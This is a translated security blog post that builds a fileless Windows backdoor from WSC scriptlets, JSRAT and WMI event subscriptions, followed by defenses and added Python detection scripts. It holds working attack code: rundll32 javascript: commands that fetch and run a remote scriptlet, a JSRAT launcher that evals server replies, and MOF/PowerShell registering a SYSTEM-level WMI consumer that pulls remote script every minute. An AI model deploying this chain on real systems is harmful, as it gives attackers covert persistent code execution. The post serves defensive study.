Merit student · 2016/05/06 14:16

0x00 Preface


Recently, I studied LCX’s material “Using WSC to make an ASP Backdoor”. After learning some features of WSC files, I had an interesting idea:

How powerful would it be if combined with JSRAT and WMI Backdoor?

Related information:

- Using WSC to make an ASP backdoor: huaidan.org/archives/25…
- The WMI Backdoor: drops.wooyun.org/tips/8260
- JavaScript Backdoor: drops.wooyun.org/tips/11764

0x01 WSC


WSC stands for Windows Script Component. It can be used to develop COM components that can be called from other languages.

For more information: www.xav.com/perl/Window…

1. Simple examples

A simple WSC script is as follows, saved as test.wsc:

```xml
<?xml version="1.0"?>
<package>
<component id="testWSC">
<public>
<method name="Sum">
<PARAMETER name="X"/>
<PARAMETER name="Y"/>
</method>
</public>
<script language="JScript">
<![CDATA[
function Sum(X, Y)
{
    var result = X + Y;
    return result;
}
]]>
</script>
</component>
</package>
```

The Sum function in the script can be called with the following js code:

```javascript
var ref = GetObject("script:C:\\testwsc\\test.wsc");
var x = ref.Sum(4, 6);
WScript.Echo(x);
```

As shown in figure

Note: the file name extension of a WSC file can be arbitrary.

2. Start the calculator locally

This is very similar to the SCT file technique, so we can change it to start a calculator.

WSC files are as follows:

```xml
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
</package>
```

The corresponding JS file can be simplified as:

```javascript
GetObject("script:C:\\testwsc\\test.wsc");
```

After execution, see the following figure:

3. Start the calculator remotely

What if the WSC file is placed on a web server instead? It still works.

The address is as follows: raw.githubusercontent.com/3gstudent/J…

Change the js file to:

```javascript
GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
```

Execute as shown in figure:
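Because the extension of a WSC file is arbitrary, a defender cannot rely on file names to find scriptlets; the content has to be inspected. The following Python is an added example (not code from the article or from the 3gstudent repository) that classifies a file as a scriptlet by its root element, parses the component structure with the standard library, and flags indicators inside the embedded script body. The sample component and the indicator list are constructed for this example.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample (not a file from the article's repository): a component with one
# public method and an embedded JScript body equivalent to the "start calc" scriptlet above.
SAMPLE_WSC = """<?xml version="1.0"?>
<package>
<component id="testCalc">
<public>
<method name="Sum">
<PARAMETER name="X"/>
<PARAMETER name="Y"/>
</method>
</public>
<script language="JScript">
<![CDATA[
function Sum(X, Y) { return X + Y; }
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</component>
</package>"""

# Indicators worth reviewing inside the embedded script body (constructed list for this example).
INDICATORS = {
    "shell_object": re.compile(r'ActiveXObject\s*\(\s*["\']WScript\.Shell["\']', re.I),
    "process_launch": re.compile(r'\.Run\s*\(', re.I),
    "remote_scriptlet": re.compile(r'GetObject\s*\(\s*["\']script:https?://', re.I),
}


def looks_like_wsc(data: str) -> bool:
    """The extension of a WSC file is arbitrary, so classify by content:
    a <component> (inside <package>) or a <scriptlet> root element."""
    head = data.lstrip()[:2000].lower()
    return "<component" in head or "<scriptlet" in head


def triage_wsc(data: str) -> list:
    """Return one record per <component>: id, public methods, and per-script indicator hits."""
    root = ET.fromstring(data)
    records = []
    for comp in root.iter("component"):
        record = {
            "id": comp.get("id"),
            "public_methods": [m.get("name") for m in comp.findall("./public/method")],
            "scripts": [],
        }
        for script in comp.findall("script"):
            body = script.text or ""  # CDATA content is exposed as plain text by ElementTree
            hits = sorted(name for name, rx in INDICATORS.items() if rx.search(body))
            record["scripts"].append({"language": script.get("language"), "indicators": hits})
        records.append(record)
    return records


if __name__ == "__main__":
    if looks_like_wsc(SAMPLE_WSC):
        for rec in triage_wsc(SAMPLE_WSC):
            print(rec)
```

The public method list is reported separately from the indicators because a scriptlet can expose harmless-looking methods while its top-level script body (executed when the moniker is resolved) does the actual work, as in the calc example above.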

0x02 JSRAT


What if this is combined with the technique of executing JS through rundll32?

1. calc

CMD to execute:

```shell
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")
```

As shown in figure

2. JSRAT

What if the content of the file on the server is replaced with the JSRAT startup code? The code is as follows:

```xml
<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
rat="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WinHttp.WinHttpRequest.5.1\");w=new%20ActiveXObject(\"WScript.Shell\");try{v=w.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet%20Settings\\\\ProxyServer\");q=v.split(\"=\")[1].split(\";\")[0];h.SetProxy(2,q);}catch(e){}h.Open(\"GET\",\"http://127.0.0.1/connect\",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im rundll32.exe\",0,true);}";
new ActiveXObject("WScript.Shell").Run(rat,0,true);
]]>
</script>
</component>
</package>
```

To keep the demos separate, this was uploaded as another file, testJSRAT: raw.githubusercontent.com/3gstudent/J…

CMD to execute:

```shell
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/testJSRAT")
```

After execution, the shell connects back to JSRAT.

3. Analysis

This approach has the following advantages:

a. The JSRAT startup code is simplified once more: only GetObject() has to be executed.
b. Since the WSC file is fetched and executed remotely, the payload can be changed at any time and the code can be updated at any time.
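From the defender's side, the whole chain above is visible in a single process-creation command line: rundll32 given a javascript: moniker, the mshtml RunHTMLApplication export, and a GetObject() call on a remote script: moniker. The following Python is an added example (not part of the article) that runs three such rules over process command lines, such as those recorded by Sysmon event 1 or Security event 4688 with command-line auditing enabled. The sample command lines are constructed; the URL in them is a placeholder, not the article's repository.

```python
import re
from dataclasses import dataclass


@dataclass
class Finding:
    line_no: int
    rule: str
    command_line: str


# Detection rules for the launch chain described in this article (constructed for this example):
# rundll32 given a javascript: moniker, the mshtml RunHTMLApplication export, and a remote scriptlet moniker.
RULES = [
    ("rundll32_javascript_moniker", re.compile(r'rundll32(?:\.exe)?["\s]+javascript:', re.I)),
    ("mshtml_runhtmlapplication", re.compile(r'mshtml\s*,\s*RunHTMLApplication', re.I)),
    ("remote_scriptlet_getobject", re.compile(r'GetObject\s*\(\s*\\?["\']script:https?://', re.I)),
]


def scan_command_lines(lines):
    """Apply every rule to every command line; return one Finding per (line, rule) match."""
    findings = []
    for line_no, cmd in enumerate(lines, start=1):
        for rule, rx in RULES:
            if rx.search(cmd):
                findings.append(Finding(line_no, rule, cmd))
    return findings


def summarize(lines):
    """Map flagged line numbers to the sorted list of rule names they triggered."""
    out = {}
    for f in scan_command_lines(lines):
        out.setdefault(f.line_no, []).append(f.rule)
    return {k: sorted(v) for k, v in out.items()}


# Constructed sample command lines (not real telemetry). Lines 1 and 3 are ordinary
# rundll32/wscript use; line 2 is the chain from this article with a placeholder URL;
# line 4 varies case and spacing to show the rules are not tied to one spelling.
SAMPLE_LOG = [
    r'C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL',
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://example.invalid/test")',
    r'wscript.exe C:\Users\user\Documents\login.js',
    r'cmd.exe /c rundll32 JAVASCRIPT:"\..\mshtml , RunHTMLApplication ";eval(x)',
]


if __name__ == "__main__":
    for line_no, rules in summarize(SAMPLE_LOG).items():
        print(line_no, rules, SAMPLE_LOG[line_no - 1])
```

rundll32 legitimately loads many DLLs, so the first rule keys on the javascript: moniker rather than on rundll32 itself; the ordinary shell32 invocation in the sample is not flagged. The third rule also accepts a backslash-escaped quote so it can be reused on strings extracted from other contexts, such as the WMI consumer ScriptText shown later in this article.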

0x03 WMI Backdoor


WMI allows not only program execution but also script execution. The program-execution method was described previously and is skipped here; the script-execution method is described below.

WMI supports VBS and JS scripts. This section describes how to start a JS script.

1. MOF

Note that in MOF the escape character is \, as shown below:

```mof
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP1";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 1";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consP1";
    ScriptingEngine = "JScript";
    ScriptText = "GetObject(\"script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test\")";
};

instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};
```

Demonstration, as shown in figure.

2. PowerShell

Note that in PowerShell a double quote inside a double-quoted string is escaped by doubling it (""), as shown below:

```powershell
$filterName = 'filtP1'
$consumerName = 'consP1'
$Command = "GetObject(""script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test"")"
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
$WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName; EventNameSpace="root\cimv2"; QueryLanguage="WQL"; Query=$Query} -ErrorAction Stop
$WMIEventConsumer = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName; ScriptingEngine='JScript'; ScriptText=$Command}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter; Consumer=$WMIEventConsumer}
```

Demonstration, as shown in figure.

3. Test

```powershell
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
```

4. Remove

```powershell
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='filtP1'" | Remove-WmiObject -Verbose
# The consumer registered above is an ActiveScriptEventConsumer, so query that class rather than CommandLineEventConsumer
Get-WMIObject -Namespace root\Subscription -Class ActiveScriptEventConsumer -Filter "Name='consP1'" | Remove-WmiObject -Verbose
# The binding's __Path embeds the filter name, so match on filtP1
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding -Filter "__Path LIKE '%filtP1%'" | Remove-WmiObject -Verbose
```

5. Analysis

a. After registration, the JS script on the remote server is executed every minute.
b. It runs with SYSTEM privileges.
c. No files are written.
d. The registry is not written.
e. It starts automatically.
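The three queries in the test step above list each class separately; what a defender actually wants is the resolved filter-to-consumer pair, graded by what the consumer does and how often the filter fires. The following Python is an added example (not part of the article) that does this over an offline export of root\subscription. The export format is an assumption for this example: a dictionary keyed by class name, shaped like the JSON that Get-CimInstance ... | ConvertTo-Json produces for each class, and the data in it is constructed (the second binding mimics the SCM Event Log binding that Windows ships with, so the example shows a benign pair alongside the pattern from this article).

```python
import re

# Constructed export (not real data), shaped like the JSON that
#   Get-CimInstance -Namespace root/subscription -ClassName <class> | ConvertTo-Json
# produces: keys are class names, values are the instances of that class.
EXPORT = {
    "__EventFilter": [
        {"Name": "filtP1", "EventNamespace": "Root\\Cimv2", "QueryLanguage": "WQL",
         "Query": "Select * From __InstanceModificationEvent Where TargetInstance Isa \"Win32_LocalTime\" And TargetInstance.Second = 1"},
        {"Name": "SCM Event Log Filter", "EventNamespace": "root\\cimv2", "QueryLanguage": "WQL",
         "Query": "select * from MSFT_SCMEventLogEvent"},
    ],
    "ActiveScriptEventConsumer": [
        {"Name": "consP1", "ScriptingEngine": "JScript",
         "ScriptText": "GetObject(\"script:https://example.invalid/test\")"},  # placeholder URL
    ],
    "NTEventLogEventConsumer": [
        {"Name": "SCM Event Log Consumer", "SourceName": "Service Control Manager"},
    ],
    "__FilterToConsumerBinding": [
        {"Filter": "__EventFilter.Name=\"filtP1\"",
         "Consumer": "ActiveScriptEventConsumer.Name=\"consP1\""},
        {"Filter": "__EventFilter.Name=\"SCM Event Log Filter\"",
         "Consumer": "NTEventLogEventConsumer.Name=\"SCM Event Log Consumer\""},
    ],
}

# Binding Filter/Consumer properties are WMI relative paths of the form Class.Name="value".
RELPATH = re.compile(r'^(?P<cls>\w+)\.Name="(?P<name>.*)"$')
# Consumer classes that execute code: worth reviewing regardless of their content.
CODE_CONSUMERS = {"ActiveScriptEventConsumer", "CommandLineEventConsumer"}
# A scriptlet moniker pointing at a web server: the consumer fetches and runs remote code on every trigger.
REMOTE_SCRIPTLET = re.compile(r'script:https?://', re.I)
# Classes used in this article to turn an __InstanceModificationEvent filter into a periodic timer.
TIMER_CLASSES = ("win32_localtime", "win32_perfformatteddata_perfos_system")


def parse_relpath(ref):
    m = RELPATH.match(ref)
    if not m:
        raise ValueError(f"unexpected reference format: {ref!r}")
    return m.group("cls"), m.group("name")


def triage_subscriptions(export):
    """Walk every binding, resolve its filter and consumer, and grade the pair."""
    filters = {f["Name"]: f for f in export.get("__EventFilter", [])}
    findings = []
    for binding in export.get("__FilterToConsumerBinding", []):
        _, filter_name = parse_relpath(binding["Filter"])
        consumer_cls, consumer_name = parse_relpath(binding["Consumer"])
        flt = filters.get(filter_name)
        consumer = next((c for c in export.get(consumer_cls, []) if c["Name"] == consumer_name), None)

        reasons = []
        if consumer_cls in CODE_CONSUMERS:
            reasons.append("code_executing_consumer")
        payload = (consumer or {}).get("ScriptText") or (consumer or {}).get("CommandLineTemplate") or ""
        if REMOTE_SCRIPTLET.search(payload):
            reasons.append("remote_scriptlet")
        query = (flt or {}).get("Query", "").lower()
        if "__instancemodificationevent" in query and any(c in query for c in TIMER_CLASSES):
            reasons.append("timer_style_trigger")
        if flt is None:
            reasons.append("dangling_filter")
        if consumer is None:
            reasons.append("dangling_consumer")

        if "remote_scriptlet" in reasons:
            severity = "high"
        elif reasons:
            severity = "review"
        else:
            severity = "info"
        findings.append({"filter": filter_name, "consumer": consumer_name,
                         "consumer_class": consumer_cls, "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage_subscriptions(EXPORT):
        print(f["severity"], f["consumer_class"], f["consumer"], "<-", f["filter"], f["reasons"])
```

Grading the binding rather than the individual instances matters because a filter or consumer on its own does nothing; it is the binding that turns the pair into a persistence mechanism. Dangling references are reported as well, since a consumer whose filter has been deleted (or vice versa) is a typical leftover of an incomplete cleanup.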

0x04 Defense


1. The first line of defense

Keep the system from being compromised in the first place. The precondition for planting this backdoor is the ability to execute code on the system, so patching promptly, installing anti-virus software and enabling the firewall are recommended.

2. The second line of defense

Establish a whitelist mechanism: enable Windows AppLocker to prevent programs and scripts that are not on the whitelist from running.

3. The third line of defense

Use EMET (Enhanced Mitigation Experience Toolkit). Configure rules to block and log the use of regsvr32 and rundll32. Reference: github.com/iadgov/Secu…

Configuring EMET to block regsvr32:

1. Download and install EMET 5.5

www.microsoft.com/en-us/downl…

2. Configure the EMET group policy template

(a) In %ProgramFiles%\EMET 5.5\Deployment\Group Policy Files\ (or %ProgramFiles(x86)%\EMET 5.5\Deployment\Group Policy Files\ on a 64-bit system) find emet.admx and emet.adml.

As shown in figure

Copy emet.admx to %SystemRoot%\PolicyDefinitions\

Copy emet.adml to %SystemRoot%\PolicyDefinitions\en-us\

3. Configure EMET rules

(a) Run gpedit.msc to open the Group Policy editor and navigate to Computer Configuration > Administrative Templates > Windows Components > EMET (on a Chinese-language system the same path appears with localised labels).

(b) Double-click Application Configuration, select Enabled, then click Show.

As shown in figure

(c) Settings

Exe value: +ASR asr_modules:scrobj.dll;scrrun.dll

As shown in figure

(d) Update the group policy template

From an elevated command prompt, run:

```shell
gpupdate /force
```

As shown in figure

(e) Test

The load of scrobj.dll by regsvr32 is blocked.

0x05 Summary


In this article, WSC, JSRAT and the WMI Backdoor are combined into a nearly "perfect" backdoor at the script level.

Of course, the purpose of this article is to help people prepare as much as possible before the technique is abused.